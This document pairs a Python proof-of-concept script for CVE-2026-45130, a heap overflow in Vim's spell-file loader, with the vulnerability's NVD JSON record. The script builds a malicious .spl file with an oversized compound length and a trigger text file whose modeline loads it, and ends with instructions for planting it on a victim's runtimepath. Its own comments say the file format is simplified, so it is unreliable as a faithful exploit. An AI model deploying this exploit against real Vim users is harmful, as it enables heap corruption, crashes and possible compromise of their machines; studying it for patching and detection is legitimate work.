CVE-2026-45130

# Proof of Concept for CVE-2026-45130 # This script generates a malicious .spl file and a text file with a modeline. # The crafted .spl file attempts to trigger the integer overflow in read_compound(). import struct def create_malicious_spl(filename): # Simplified SPL structure to trigger the vulnerability # In a real scenario, specific binary headers and offsets are required. # This attempts to set a large length field for the compound section. with open(filename, 'wb') as f: # SPL Header (magic bytes etc - simplified) f.write(b'VIMspell') # SN_REGION: Compound info section # The vulnerability occurs when calculating buffer size based on a length field here. # We inject a large value to cause integer overflow in multiplication. # Target calculation: len * sizeof(short) overflow. # Arbitrary large number to trigger overflow on 32-bit signed int evil_length = 0x10000000 # Write section header (type, length) # Assuming section type for compound words f.write(struct.pack('<I', 1)) # Section type f.write(struct.pack('<I', evil_length)) # Evil length field # Padding data f.write(b'A' * 100) def create_trigger_txt(filename, spl_filename): # Create a text file with a modeline that sets spelllang to the malicious file content = f"""Normal text content. vim: set spelllang={spl_filename}: """ with open(filename, 'w') as f: f.write(content) if __name__ == "__main__": print(f"[+] Generating malicious spell file: evil.spl") create_malicious_spl('evil.spl') print(f"[+] Generating trigger text file: trigger.txt") create_trigger_txt('trigger.txt', 'evil.spl') print(f"[+] Done. Place 'evil.spl' in the runtimepath and open 'trigger.txt' with vulnerable Vim.")

{"cve": {"id": "CVE-2026-45130", "sourceIdentifier": "[email protected]", "published": "2026-05-08T23:16:40.053", "lastModified": "2026-05-08T23:16:40.053", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vim is an open source, command line text editor. Prior to version 9.2.0450, a heap buffer overflow exists in read_compound() in src/spellfile.c when loading a crafted spell file (.spl) with UTF-8 encoding active. An attacker-controlled length field in the spell file's compound section overflows a 32-bit signed integer multiplication, causing a small buffer to be allocated for a write loop that runs many iterations, overflowing the heap. Because the 'spelllang' option can be set from a modeline, a text file modeline can trigger spell file loading if a malicious .spl file has been planted on the runtimepath. This issue has been patched in version 9.2.0450."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-190"}]}], "references": [{"url": "https://github.com/vim/vim/commit/92993329178cb1f72d700fff45ca86e1c2d369f8", "source": "[email protected]"}, {"url": "https://github.com/vim/vim/releases/tag/v9.2.0450", "source": "[email protected]"}, {"url": "https://github.com/vim/vim/security/advisories/GHSA-q4jv-r9gj-6cwv", "source": "[email protected]"}]}}